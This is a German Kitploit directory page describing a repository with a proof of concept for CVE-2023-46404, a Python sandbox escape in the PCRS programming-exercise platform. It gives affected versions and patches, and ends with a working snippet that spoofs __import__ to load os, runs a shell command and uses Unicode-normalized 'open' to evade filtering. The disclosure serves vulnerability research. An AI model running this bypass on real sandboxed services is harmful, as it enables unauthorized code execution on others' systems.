Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46404 — PoC and Writeup for CVE-2023-46404. | Kitploit
Tools/GitHubGitHub/windecks/cve-2023-46404
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubwindecks/cve-2023-46404

CVE-2023-46404

PoC and Writeup for CVE-2023-46404.

Repository anzeigen
3vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-46404

PCRS ist eine Webanwendung für Online-Programmierübungen, die an der University of Toronto entwickelt wurde. Siehe Bitbucket-Repository: https://bitbucket.org/utmandrew/pcrs/src/3.11/

Zusammenfassung

Die PCRS-„Questions“-Seite mit Code-Einreichung und die „Code editor“-Seite sind anfällig für Remote-Code-Ausführung (RCE) durch Umgehung der Python-Sandbox.

Details

Remote-Code-Ausführung kann in PCRS-Instanzen durch die Verwendung von Generatorobjekten erreicht werden. Durch die Verwendung von Generator-Frames (gi_frame) und f_back können Skripte aus einem sandboxed Stack-Frame ausbrechen und bösartigen Code in einer nicht sandboxed Umgebung ausführen. Zusätzlich kann Unicode-Normalisierung leicht eine grundlegende Eingabebereinigung umgehen. Jeder authentifizierte Benutzer mit minimalen Rechten kann diesen Angriff durchführen. Siehe PoC für weitere Details.

Bekannte betroffene Versionen

  • PCRS <= 3.11 d0de1e mit Python-Ausführung.
  • Patch implementiert in 9326ad3 mit teilweiser Abschwächung in fbaedd3.

Gegenmaßnahmen

Die Entwicklung sicherer Isolationsmechanismen von Grund auf ist anfällig für Versehen und Schwachstellen. Wie immer ist es besser, eine Ausführungsumgebung zu sandboxen als eine Sprache.

Extra

Das Überschreiben von __eq__ kann in einer eingeschränkten Umgebung verwendet werden:

root@kitploit:~
def f():
    mod_name = "os"
    fake_name = "json"
    os = __import__(type("s", (str,), {"__eq__": lambda x, y: y == fake_name or y == mod_name, "__hash__": lambda x: hash(mod_name)})(mod_name))
    os.system("id > /tmp/test.txt")
    s = ᵒpen("/tmp/test.txt").read() # unicode normalization of the "open" function
    os.system("rm /tmp/test.txt")
    return s
Tool herunterladen